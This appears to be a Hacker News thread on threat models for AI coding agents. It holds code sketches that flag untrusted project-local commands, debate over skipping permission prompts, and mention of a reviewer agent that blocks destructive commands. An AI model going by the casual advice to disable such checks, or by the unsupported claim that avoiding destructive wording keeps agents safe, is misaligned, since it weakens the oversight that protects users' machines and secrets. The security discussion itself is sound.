I want to avoid running untrusted code on my local machine, because it could steal secrets, install malware, etc.

Since the model is allowed to write without restriction (I think) to the project directory, anything in the project directory is also untrusted. Running standard commands from the system is fine, as long as you know what those commands are going to do. Running anything from the local directory should be avoided because the code is untrusted.
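
As a minimal sketch of that last rule, assuming a POSIX-style system: the hypothetical helper below flags a command when the program it launches resolves to somewhere inside the project directory. It only looks at the first word, so it misses cases like `python script.py` or `npm test`, where a system binary ends up executing project code.

```python
import shlex
import shutil
from pathlib import Path


def runs_project_code(command: str, project_dir: str) -> bool:
    """True if the program being launched lives inside the project directory."""
    argv = shlex.split(command)
    if not argv:
        return False
    program = argv[0]
    project = Path(project_dir).resolve()
    if "/" in program:
        # Relative paths are taken to start at the project directory;
        # an absolute path simply replaces it.
        target = (project / program).resolve()
    else:
        found = shutil.which(program)
        if found is None:
            return True  # unknown program: treat as untrusted
        target = Path(found).resolve()
    return target == project or project in target.parents


local = runs_project_code("./node_modules/.bin/eslint .", "/tmp/proj")
system = runs_project_code("/bin/ls -la", "/tmp/proj")
```

`local` is flagged and `system` is not. Anything that cannot be found on the PATH is treated as untrusted, which errs on the side of asking.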

This is just one security model, there are many others! If a person is running claude in a stronger sandbox, that changes the model considerably. What threat model do you use to evaluate whether an agent's actions are safe?

[0]: https://www.schneier.com/essays/archives/2024/05/llms-data-c... [1]: https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/

kennywinker

a day ago

If you think the worst that an agent can do is leak your package.json, your threat model is wayyy broken.

atemerev

a day ago

--dangerously-skip-permissions is the only way to fly. Of course your environment needs to be properly containerized and autobackup set up, so even rm -rf from your harness would do nothing. Life is too short to spend on replying to permissions requests.

prerok

a day ago

I've seen these suggestions but I am really curious about the setup because I just don't get it.

If you want to work on the code then you need to have access to the repositories, so you need the github token. Then, to test the app, you may need your own backend token. And VPN. Of course, only to DEV, of course all tokens encrypted. So, only DEV and your branch of the code is in danger. In my view, even that is pretty bad.

So, how does such a setup work?

stratos123

19 hours ago

You could clone the repo yourself and not give the agent any tokens at all. When done, push it yourself. This also lets you sandbox the agent to only have access to the local repo and nothing else.

atemerev

15 hours ago

Git makes actions reversible. Containers and VMs allow the agent to access only the things you explicitly put inside. Okay, yes, an agent can corrupt a dev database. You need to make sure it can be easily restored anytime. Simple.

kennywinker

a day ago

Lol. Countdown til you get pwned starts today. Let me know how that works out for you in six months.

atemerev

15 hours ago

Well, I've been working like that for about a year already, starting from the earliest days of agents.

kennywinker

15 hours ago

Wow a whole year! I guess it’ll never happen.

inetknght

18 hours ago

Scope Violation: `cat ~/.zshrc`

Scope Violation: `ls ~/Documents`

Buddy, my `${HOME}` is committed to a repository. It includes `.bashrc` and `Documents` directory. These are not scope violations if I'm having the LLM work on them!
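
To illustrate why the answer depends on the workspace root, here is a small sketch of a scope check that takes the root as a parameter. The function name, the example paths, and the idea that the game could be configured this way are all assumptions; it handles POSIX-style paths only and does not follow symlinks.

```python
import posixpath


def in_scope(path: str, workspace_root: str, home: str) -> bool:
    """True if `path` falls under `workspace_root` (an absolute path).

    A leading ~ is expanded to `home`; relative paths are taken to start
    at the workspace root; ".." segments are normalised before comparing.
    """
    if path == "~" or path.startswith("~/"):
        path = home + path[1:]
    root = posixpath.normpath(workspace_root)
    target = posixpath.normpath(posixpath.join(root, path))
    return posixpath.commonpath([root, target]) == root


# Project checked out below the home directory: dotfiles are out of scope.
project_case = in_scope("~/.zshrc", "/home/u/code/app", "/home/u")
# The home directory itself is the repository: the same path is in scope.
home_repo_case = in_scope("~/.zshrc", "/home/u", "/home/u")
```

The same `cat ~/.zshrc` is a violation in the first case and ordinary work in the second, so a fixed list of "out of scope" paths cannot be right for every setup.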

Trung0246

a day ago

Nice got 6/6

rib3ye

18 hours ago

claude --dangerously-skip-permissions

just give in

scotty79

19 hours ago

Permissions don't do much. They won't save you. You can just skip them completely.

If you are afraid that AI can delete something, do what you'd do with a potentially malicious user. Sandbox, don't give permissions, set up remote backups and so on.

Also (unless prompt injected) models are not eager to start going rogue on your stuff.

But keep in mind the saying “Children don’t hear prohibitions — they hear suggestions.”

Same thing goes for LLMs. Never talk with an LLM about deleting stuff. Archiving, moving, retaining elsewhere... sure, but never about actually destructive operations. Don't use destructive language.

wilg

20 hours ago

"Auto" in Claude and "Auto-review" in Codex are the only way to do agentic coding.

jMyles

20 hours ago

I haven't run claude code without --dangerously-skip-permissions in quite some time. I'm surprised that it's still the norm to endure permission spamming?

(I run it on a VPS of course, not my laptop)

yieldcrv

17 hours ago

that was soooo last month, “auto-mode” is the way now

another agent reviews every command and blocks destructive ones

ramonga

a day ago

Score is 6711 by just saying no to everything